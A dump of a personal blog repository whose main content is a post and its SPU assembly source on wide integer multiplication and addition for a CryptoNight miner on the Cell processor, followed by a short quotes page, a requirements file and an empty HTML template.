30 | Consider the `a` and `b` input registers: the 64-bit LHS and RHS of the multiplication operation are composed of the half-words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
31 |
32 | ```
33 | 0 16 32 48 64 80 96 112 128
34 | +--------+--------+--------+--------+--------+--------+--------+--------+
35 | a: | a0 | a1 | a2 | a3 | XX | XX | XX | XX |
36 | +--------+--------+--------+--------+--------+--------+--------+--------+
37 | +--------+--------+--------+--------+--------+--------+--------+--------+
38 | b: | b0 | b1 | b2 | b3 | XX | XX | XX | XX |
39 | +--------+--------+--------+--------+--------+--------+--------+--------+
40 | MSB LSB
41 | ```
42 |
43 | This is equivalent to the following representation:
44 |
45 | ```
46 | LHS := a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)
47 | RHS := b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48)
48 | ```
49 |
50 | Applying the distributive property, the multiplication of both values should be equivalent to:
51 |
52 | ```
53 | LHS * RHS = (a3 + (a2 * 2^16) + (a1 * 2^32) + (a0 * 2^48)) *
54 | (b3 + (b2 * 2^16) + (b1 * 2^32) + (b0 * 2^48))
55 | = (a3*b3*2^00) + (a3*b2*2^16) + (a3*b1*2^32) + (a3*b0*2^48) +
56 | (a2*b3*2^16) + (a2*b2*2^32) + (a2*b1*2^48) + (a2*b0*2^64) +
57 | (a1*b3*2^32) + (a1*b2*2^48) + (a1*b1*2^64) + (a1*b0*2^80) +
58 | (a0*b3*2^48) + (a0*b2*2^64) + (a0*b1*2^80) + (a0*b0*2^96)
59 | ```
60 |
61 | Our implementation will perform these 16 multiplications of 16-bit words (`aX*bY`), shift the results (`*2^N`), and add everything together using 128-bit additions.
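
As a sanity check of the expansion above, here is a minimal Python sketch that performs the same 16 half-word multiplications, shifts and additions, and compares well against Python's native big-integer product. It is not part of the miner; `halfwords` and `mul_64x64` are names made up for this illustration.

```python
MASK16 = 0xFFFF


def halfwords(x):
    """Split a 64-bit integer into [x0, x1, x2, x3], most significant first."""
    return [(x >> shift) & MASK16 for shift in (48, 32, 16, 0)]


def mul_64x64(lhs, rhs):
    """64-bit x 64-bit -> 128-bit product built from 16-bit x 16-bit products."""
    a = halfwords(lhs)
    b = halfwords(rhs)
    result = 0
    for i in range(4):
        for j in range(4):
            # a[i] carries weight 2^(16*(3-i)) and b[j] carries 2^(16*(3-j)),
            # so their product must be shifted by the sum of both exponents.
            shift = 16 * ((3 - i) + (3 - j))
            result += (a[i] * b[j]) << shift
    return result & ((1 << 128) - 1)
```

For example, `mul_64x64(x, y) == x * y` should hold for any pair of unsigned 64-bit integers `x` and `y`.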
62 |
63 | ### Implementation
64 |
65 | First of all, let's recap the available multiplication operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
66 |
67 | > * `mpy rt,ra,rb`: **Multiply**. The signed 16 least significant bits of the corresponding word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
68 | > * `mpyhh rt,ra,rb`: **Multiply high high**. The signed 16 most significant bits of the word elements of registers `ra` and `rb` are multiplied, and the 32-bit products are placed in the corresponding word elements of register `rt`.
69 |
70 | When necessary, unsigned variants are available by adding a `u` suffix to the instruction name.
71 |
72 | #### 1. Multiplying half-words
73 |
74 | The distributive unfolding of the multiplication described earlier involves multiplying 16 half-word pairs into 16 words. Each multiplication instruction yields at most four 32-bit words, but since only 64 bits are used in `a` and `b`, only 2 of them are useful.
75 |
76 | To minimize the number of multiplications, we can duplicate/shuffle half-words to the unused 64-bits of the quad-word via `shufb` as follows (this step can also be used to switch endianness, if necessary):
77 |
78 | ```
79 | 0 16 32 48 64 80 96 112 128
80 | +--------+--------+--------+--------+--------+--------+--------+--------+
81 | a: | a0 | a1 | a2 | a3 | a2 | a3 | a0 | a1 |
82 | +--------+--------+--------+--------+--------+--------+--------+--------+
83 | +--------+--------+--------+--------+--------+--------+--------+--------+
84 | b: | b0 | b1 | b2 | b3 | b0 | b1 | b2 | b3 |
85 | +--------+--------+--------+--------+--------+--------+--------+--------+
86 | MSB LSB
87 | ```
88 |
89 | Additionally, we left-shift both `a` and `b` by 16 bits into `c` and `d` respectively, to do high-low multiplications (similarly to the `mpyh` instruction but without post-shifting). It does not matter whether the least significant half-word of each word is zeroed, since only the most significant half-words of `c` and `d` are used. The result is:
90 |
91 | ```
92 | 0 16 32 48 64 80 96 112 128
93 | +--------+--------+--------+--------+--------+--------+--------+--------+
94 | c: | a1 | (a2) | a3 | (a2) | a3 | (a0) | a1 | (00) |
95 | +--------+--------+--------+--------+--------+--------+--------+--------+
96 | +--------+--------+--------+--------+--------+--------+--------+--------+
97 | d: | b1 | (b2) | b3 | (b0) | b1 | (b2) | b3 | (00) |
98 | +--------+--------+--------+--------+--------+--------+--------+--------+
99 | MSB LSB
100 | ```
101 |
102 | This way we can generate all necessary multiplications as follows:
103 |
104 | ```
105 | mpy t0, a, b
106 | mpyhh t1, a, d
107 | mpyhh t2, b, c
108 | mpyhh t3, a, b
109 | ```
110 |
111 | Leaving us with the following results:
112 |
113 | ```
114 | 0 16 32 48 64 80 96 112 128
115 | +--------+--------+--------+--------+--------+--------+--------+--------+
116 | t0 | a1 * b1 | a3 * b3 | a3 * b1 | a1 * b3 |
117 | +--------+--------+--------+--------+--------+--------+--------+--------+
118 | +--------+--------+--------+--------+--------+--------+--------+--------+
119 | t1 | a0 * b1 | a2 * b3 | a2 * b1 | a0 * b3 |
120 | +--------+--------+--------+--------+--------+--------+--------+--------+
121 | +--------+--------+--------+--------+--------+--------+--------+--------+
122 | t2 | b0 * a1 | b2 * a3 | b0 * a3 | b2 * a1 |
123 | +--------+--------+--------+--------+--------+--------+--------+--------+
124 | +--------+--------+--------+--------+--------+--------+--------+--------+
125 | t3 | a0 * b0 | a2 * b2 | a2 * b0 | a0 * b2 |
126 | +--------+--------+--------+--------+--------+--------+--------+--------+
127 | MSB LSB
128 | ```
129 |
130 | #### 2. Shuffling half-words
131 |
132 | Before adding each of these 16 words, we need to multiply each by the corresponding power of 2 computed previously (i.e. shifting by a certain amount in bits). These constants are:
133 |
134 | ```
135 | 0 16 32 48 64 80 96 112 128
136 | +--------+--------+--------+--------+--------+--------+--------+--------+
137 | t0 | t00 64 | t01 0 | t02 32 | t03 32 |
138 | +--------+--------+--------+--------+--------+--------+--------+--------+
139 | +--------+--------+--------+--------+--------+--------+--------+--------+
140 | t1 | t10 80 | t11 16 | t12 48 | t13 48 |
141 | +--------+--------+--------+--------+--------+--------+--------+--------+
142 | +--------+--------+--------+--------+--------+--------+--------+--------+
143 | t2 | t20 80 | t21 16 | t22 48 | t23 48 |
144 | +--------+--------+--------+--------+--------+--------+--------+--------+
145 | +--------+--------+--------+--------+--------+--------+--------+--------+
146 | t3 | t30 96 | t31 32 | t32 64 | t33 64 |
147 | +--------+--------+--------+--------+--------+--------+--------+--------+
148 | MSB LSB
149 | ```
150 |
151 | We need to move these words into their proper locations (note that some words like `t02` or `t30` are already well placed). Using scratch registers is necessary, since working directly on {t0, t1, t2, t3} would cause bits to get lost due to overlaps. Doing this naively would involve using 16 scratch registers, i.e. 16 128-bit integers to be added later on.
152 |
153 | However, by shuffling bytes via `shufb` we can bring this down to only 7 scratch registers:
154 |
155 | ```
156 | 128 112 96 80 64 48 32 16 0
157 | +--------+--------+--------+--------+--------+--------+--------+--------+
158 | v0 | | ##### t00 ##### | ##### t02 ##### | ##### t01 ##### |
159 | +--------+--------+--------+--------+--------+--------+--------+--------+
160 | +--------+--------+--------+--------+--------+--------+--------+--------+
161 | v1 | ##### t30 ##### | ##### t32 ##### | ##### t31 ##### | |
162 | +--------+--------+--------+--------+--------+--------+--------+--------+
163 | +--------+--------+--------+--------+--------+--------+--------+--------+
164 | v2 | | ##### t33 ##### | ##### t03 ##### | |
165 | +--------+--------+--------+--------+--------+--------+--------+--------+
166 | +--------+--------+--------+--------+--------+--------+--------+--------+
167 | v3 | | ##### t10 ##### | ##### t12 ##### | ##### t11 ##### | |
168 | +--------+--------+--------+--------+--------+--------+--------+--------+
169 | +--------+--------+--------+--------+--------+--------+--------+--------+
170 | v4 | | ##### t20 ##### | ##### t22 ##### | ##### t21 ##### | |
171 | +--------+--------+--------+--------+--------+--------+--------+--------+
172 | +--------+--------+--------+--------+--------+--------+--------+--------+
173 | v5 | | ##### t13 ##### | |
174 | +--------+--------+--------+--------+--------+--------+--------+--------+
175 | +--------+--------+--------+--------+--------+--------+--------+--------+
176 | v6 | | ##### t23 ##### | |
177 | +--------+--------+--------+--------+--------+--------+--------+--------+
178 | MSB LSB
179 | ```
180 |
181 | This is accomplished by the following operations (note that only 5 shuffle masks are necessary):
182 |
183 | ```
184 | shufb v0, t0, t0, mask_v0
185 | shufb v1, t3, t3, mask_v1
186 | shufb v2, t0, t3, mask_v2
187 | shufb v3, t1, t1, mask_v3_v4
188 | shufb v4, t2, t2, mask_v3_v4
189 | shufb v5, t1, t1, mask_v5_v6
190 | shufb v6, t2, t2, mask_v5_v6
191 | ```
192 |
193 | #### 3. Adding results
194 |
195 | The final step is adding the 7 resulting 128-bit words {v0, ..., v6} as described by the algorithm "*Addition (128-bit)*". Let such algorithm be implemented by the macro `add_128(output, lhs, rhs)`. The final result `r` of the multiplication algorithm is computed as follows:
196 |
197 | ```
198 | add_128 t0, v0, v1
199 | add_128 t1, v2, v3
200 | add_128 t2, v4, v5
201 | add_128 t0, t0, t1
202 | add_128 t0, t0, t2
203 | add_128 r, t0, v6
204 | ```
205 |
206 | As a final step, one might shuffle bytes again to match the desired endianness.
207 |
208 | ## Addition (128-bit)
209 |
210 | During the implementation of "*Multiplication (64-bit)*" we required a 128-bit + 128-bit integer addition that results in a 128-bit integer, but the largest granularity we can achieve for additions in SPUs is 32-bit. Although our approach here is relatively straightforward, we document it here for the sake of completeness.
211 |
212 | ### Theory
213 |
214 | Consider the `a` and `b` input registers and the `s` output register. The 128-bit LHS and RHS of the addition operation are composed of the 32-bit words [a0, a1, a2, a3] and [b0, b1, b2, b3], respectively.
215 |
216 | ```
217 | 0 32 64 96 128
218 | +-----------------+-----------------+-----------------+-----------------+
219 | a: | a0 | a1 | a2 | a3 |
220 | +-----------------+-----------------+-----------------+-----------------+
221 | +-----------------+-----------------+-----------------+-----------------+
222 | b: | b0 | b1 | b2 | b3 |
223 | +-----------------+-----------------+-----------------+-----------------+
224 | MSB LSB
225 | ```
226 |
227 | This is equivalent to the following representation:
228 |
229 | ```
230 | LHS := a3 + (a2 * 2^32) + (a1 * 2^64) + (a0 * 2^96)
231 | RHS := b3 + (b2 * 2^32) + (b1 * 2^64) + (b0 * 2^96)
232 | ```
233 |
234 | Similar to a four-bit adder, we perform the addition component-wise, propagating the carry bit from the LSW to the MSW. We represent this carry bit with the `overflow` function (shortened as `o`), which takes an addition result and outputs 1 if the result is >= 2^32, and 0 otherwise. Each `sN` is then truncated to 32 bits.
235 |
236 | ```
237 | s3 = a3 + b3
238 | s2 = a2 + b2 + overflow(s3)
239 | s1 = a1 + b1 + overflow(s2)
240 | s0 = a0 + b0 + overflow(s1)
241 | ```
242 |
243 | ### Implementation
244 |
245 | First of all, let's recap the relevant addition and shift operations in SPU (quoted from the *Synergistic Processor Unit Instruction Set Architecture v1.2*):
246 |
247 | > * `a rt,ra,rb`: **Add Word**. Each word element of register `ra` is added to the corresponding word element of register `rb`, and the results are placed in the corresponding word elements of register `rt`.
248 | > * `cg rt,ra,rb`: **Carry Generate**. Each word element of register `ra` is added to the corresponding word element of register `rb`. The carry out is placed in the least significant bit of the corresponding word element of register `rt`, and 0 is placed in the remaining bits of `rt`.
249 | > * `shlqbyi rt,ra,value`: **Shift Left Quadword by Bytes Immediate**. The contents of register `ra` are shifted left by the number of bytes specified by the unsigned 5-bit `value`. The result is placed in register `rt`.
250 |
251 | #### 1. Basic idea
252 |
253 | By using these instructions, we can perform this addition as follows:
254 |
255 | ```
256 | +-----------------+-----------------+-----------------+-----------------+
257 | t0 | t00: a0 + b0 | t01: a1 + b1 | t02: a2 + b2 | t03: a3 + b3 |
258 | +-----------------+-----------------+-----------------+-----------------+
259 | c0 | c00: o(a1 + b1) | c01: o(a2 + b2) | c02: o(a3 + b3) | |
260 | +-----------------+-----------------+-----------------+-----------------+
261 | +-----------------+-----------------+-----------------+-----------------+
262 | t1 | t10: t00+c00 | t11: t01+c01 | t12: t02+c02 | |
263 | +-----------------+-----------------+-----------------+-----------------+
264 | c1 | c10: o(t01+c01) | c11: o(t02+c02) | | |
265 | +-----------------+-----------------+-----------------+-----------------+
266 | +-----------------+-----------------+-----------------+-----------------+
267 | t2 | t20: t10+c10 | t21: t11+c11 | | |
268 | +-----------------+-----------------+-----------------+-----------------+
269 | c2 | c20: o(t11+c11) | | | |
270 | +-----------------+-----------------+-----------------+-----------------+
271 | +-----------------+-----------------+-----------------+-----------------+
272 | t3 | t30: t20+c20 | | | |
273 | +-----------------+-----------------+-----------------+-----------------+
274 | ```
275 |
276 | Here, at each iteration *N = {0,1,2,3}*, the temporary variable *tN* contains the 32-bit componentwise addition of *tN-1* and *cN-1*. This can easily be done with the `a` instruction described before. The temporary variables *cN* contain the word-shifted carry bit of said addition, which can be achieved by a combination of the `cg` and `shlqbyi` instructions.
277 |
278 | This process is kickstarted by computing the addition and shifted overflow of the original LHS and RHS components into the *t0* and *c0* registers respectively. The final output register `r` can simply be computed as [t30, t21, t12, t03].
279 |
280 | #### 2. Optimizing register usage
281 |
282 | By analyzing dependencies, you might observe that no more than 3 temporary variables are used at any time. Let's redefine these as `t0`, `t1`, `t2`. Additionally, given that left-shifts are always zero-extended, we can preserve the LSWs as we "carry on" with the computation (no pun intended), saving us from cherry-picking words from different temporaries into `r`.
283 |
284 | The final algorithm would look like this:
285 |
286 | ```
287 | cg t1, lhs, rhs
288 | a t0, lhs, rhs
289 | shlqbyi t1, t1, 4
290 | cg t2, t0, t1
291 | a t0, t0, t1
292 | shlqbyi t2, t2, 4
293 | cg t1, t0, t2
294 | a t0, t0, t2
295 | shlqbyi t1, t1, 4
296 | a r, t0, t1
297 | ```
298 |
299 | Note that the same approach is used to perform 64-bit additions, required in CryptoNight's Memory-Hard Loop.
300 |
301 | ## Sources
302 |
303 | You can find the source code for these implementations in: [`arithmetic.s`](arithmetic.s).
304 |
--------------------------------------------------------------------------------
/posts/2019-02-16-cell-miner-alu/arithmetic.s:
--------------------------------------------------------------------------------
1 | /**
2 | * SPU high-performance wide arithmetic.
3 | * Author: Alexandro Sanchez Bach .
4 | */
5 |
6 | // Registers
7 |
8 | #define alu_reg_se32 $80
9 | #define alu_reg_se64 $81
10 | #define alu_reg_se128 $82
11 | #define alu_reg_mul_lhs $83
12 | #define alu_reg_mul_rhs $84
13 | #define alu_reg_mul_m0 $85
14 | #define alu_reg_mul_m1 $86
15 | #define alu_reg_mul_m2 $87
16 | #define alu_reg_mul_m3 $88
17 | #define alu_reg_mul_m4 $89
18 | #define alu_reg_add_m64 $90
19 |
20 | #define alu_reg_i0 $40
21 | #define alu_reg_i1 $41
22 | #define alu_reg_t0 $42
23 | #define alu_reg_t1 $43
24 | #define alu_reg_t2 $44
25 | #define alu_reg_t3 $45
26 | #define alu_reg_v0 $46
27 | #define alu_reg_v1 $47
28 | #define alu_reg_v2 $48
29 | #define alu_reg_v3 $49
30 | #define alu_reg_v4 $50
31 | #define alu_reg_v5 $51
32 | #define alu_reg_v6 $52
33 |
34 | // Constants
35 |
36 | .align 4
37 | .global alu_endian
38 | alu_endian:
39 | // swap-endian-32
40 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
41 | .byte 0x0B, 0x0A, 0x09, 0x08, 0x0F, 0x0E, 0x0D, 0x0C
42 | // swap-endian-64
43 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
44 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
45 | // swap-endian-128
46 | .byte 0x0F, 0x0E, 0x0D, 0x0C, 0x0B, 0x0A, 0x09, 0x08
47 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
48 |
49 | .align 4
50 | .global alu_wswap
51 | alu_wswap:
52 | // mul_lhs: switch endian, then word swap [0,1,2,3] -> [0,1,1,0]
53 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
54 | .byte 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04
55 | // mul_rhs: switch endian, then word swap [0,1,2,3] -> [0,1,0,1]
56 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
57 | .byte 0x07, 0x06, 0x05, 0x04, 0x03, 0x02, 0x01, 0x00
58 |
59 | .align 4
60 | .global alu_mul64_constants
61 | alu_mul64_constants:
62 | // v0
63 | .byte 0x80, 0x80, 0x80, 0x80, 0x00, 0x01, 0x02, 0x03
64 | .byte 0x08, 0x09, 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07
65 | // v1
66 | .byte 0x00, 0x01, 0x02, 0x03, 0x08, 0x09, 0x0A, 0x0B
67 | .byte 0x04, 0x05, 0x06, 0x07, 0x80, 0x80, 0x80, 0x80
68 | // v2
69 | .byte 0x80, 0x80, 0x80, 0x80, 0x1C, 0x1D, 0x1E, 0x1F
70 | .byte 0x0C, 0x0D, 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80
71 | // v3+v4
72 | .byte 0x80, 0x80, 0x00, 0x01, 0x02, 0x03, 0x08, 0x09
73 | .byte 0x0A, 0x0B, 0x04, 0x05, 0x06, 0x07, 0x80, 0x80
74 | // v5+v6
75 | .byte 0x80, 0x80, 0x80, 0x80, 0x80, 0x80, 0x0C, 0x0D
76 | .byte 0x0E, 0x0F, 0x80, 0x80, 0x80, 0x80, 0x80, 0x80
77 |
78 | .align 4
79 | .global alu_add64_constants
80 | alu_add64_constants:
81 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
82 | .byte 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00
83 |
84 | // Macros
85 |
86 | #define add_64(ret, lhs, rhs) \
87 | shufb alu_reg_t0, lhs, lhs, alu_reg_se64 ;\
88 | shufb alu_reg_t1, rhs, rhs, alu_reg_se64 ;\
89 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\
90 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\
91 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\
92 | and alu_reg_t2, alu_reg_t2, alu_reg_add_m64 ;\
93 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\
94 | shufb ret, alu_reg_t0, alu_reg_t0, alu_reg_se64 ;
95 |
96 | #define add_128(ret, lhs, rhs) \
97 | cg alu_reg_t1, lhs, rhs ;\
98 | a alu_reg_t0, lhs, rhs ;\
99 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\
100 | cg alu_reg_t2, alu_reg_t0, alu_reg_t1 ;\
101 | a alu_reg_t0, alu_reg_t0, alu_reg_t1 ;\
102 | shlqbyi alu_reg_t2, alu_reg_t2, 4 ;\
103 | cg alu_reg_t1, alu_reg_t0, alu_reg_t2 ;\
104 | a alu_reg_t0, alu_reg_t0, alu_reg_t2 ;\
105 | shlqbyi alu_reg_t1, alu_reg_t1, 4 ;\
106 | a ret, alu_reg_t0, alu_reg_t1 ;
107 |
108 | #define mul_64(ret, lhs, rhs) \
109 | shufb alu_reg_i0, lhs, lhs, alu_reg_mul_lhs ;\
110 | shufb alu_reg_i1, rhs, rhs, alu_reg_mul_rhs ;\
111 | shli alu_reg_v0, alu_reg_i0, 16 ;\
112 | shli alu_reg_v1, alu_reg_i1, 16 ;\
113 | mpyu alu_reg_t0, alu_reg_i0, alu_reg_i1 ;\
114 | mpyhhu alu_reg_t1, alu_reg_i0, alu_reg_v1 ;\
115 | mpyhhu alu_reg_t2, alu_reg_i1, alu_reg_v0 ;\
116 | mpyhhu alu_reg_t3, alu_reg_i0, alu_reg_i1 ;\
117 | shufb alu_reg_v0, alu_reg_t0, alu_reg_t0, alu_reg_mul_m0 ;\
118 | shufb alu_reg_v1, alu_reg_t3, alu_reg_t3, alu_reg_mul_m1 ;\
119 | shufb alu_reg_v2, alu_reg_t0, alu_reg_t3, alu_reg_mul_m2 ;\
120 | shufb alu_reg_v3, alu_reg_t1, alu_reg_t1, alu_reg_mul_m3 ;\
121 | shufb alu_reg_v4, alu_reg_t2, alu_reg_t2, alu_reg_mul_m3 ;\
122 | shufb alu_reg_v5, alu_reg_t1, alu_reg_t1, alu_reg_mul_m4 ;\
123 | shufb alu_reg_v6, alu_reg_t2, alu_reg_t2, alu_reg_mul_m4 ;\
124 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v1) ;\
125 | add_128(alu_reg_v2, alu_reg_v2, alu_reg_v3) ;\
126 | add_128(alu_reg_v4, alu_reg_v4, alu_reg_v5) ;\
127 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v2) ;\
128 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v4) ;\
129 | add_128(alu_reg_v0, alu_reg_v0, alu_reg_v6) ;\
130 | shufb ret, alu_reg_v0, alu_reg_v0, alu_reg_se64 ;
131 |
132 | // Functions
133 |
134 | .global alu_constants_init
135 | .type alu_constants_init, @function
136 | alu_constants_init:
137 | ila alu_reg_t0, alu_endian
138 | lqd alu_reg_se32, 0x00(alu_reg_t0)
139 | lqd alu_reg_se64, 0x10(alu_reg_t0)
140 | lqd alu_reg_se128, 0x20(alu_reg_t0)
141 | ila alu_reg_t0, alu_wswap
142 | lqd alu_reg_mul_lhs, 0x00(alu_reg_t0)
143 | lqd alu_reg_mul_rhs, 0x10(alu_reg_t0)
144 | ila alu_reg_t0, alu_mul64_constants
145 | lqd alu_reg_mul_m0, 0x00(alu_reg_t0)
146 | lqd alu_reg_mul_m1, 0x10(alu_reg_t0)
147 | lqd alu_reg_mul_m2, 0x20(alu_reg_t0)
148 | lqd alu_reg_mul_m3, 0x30(alu_reg_t0)
149 | lqd alu_reg_mul_m4, 0x40(alu_reg_t0)
150 | ila alu_reg_t0, alu_add64_constants
151 | lqd alu_reg_add_m64, 0x00(alu_reg_t0)
152 | bi $lr
153 |
--------------------------------------------------------------------------------
/posts/2024-04-28-quotes/_main.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: live
3 | date: 2024-04-28
4 | title: Quotes
5 | author: Alexandro Sanchez
6 | ---
7 |
8 | "Wir müssen wissen. Wir werden wissen." — David Hilbert
9 |
10 | "Everyone who confuses correlation with causation eventually ends up dead." — Alan Cooper
11 |
12 | "I like offending people, because I think the people who get offended should be offended." — Linus Torvalds
13 |
14 | "The less confident you are, the more serious you have to act." — Tara Ploughman
15 |
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | markdown==3.3.3
2 | pygments==2.15.0
3 |
--------------------------------------------------------------------------------
/templates/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | Blog
7 |
8 |
9 |
10 |
37 |
38 |
39 |
40 |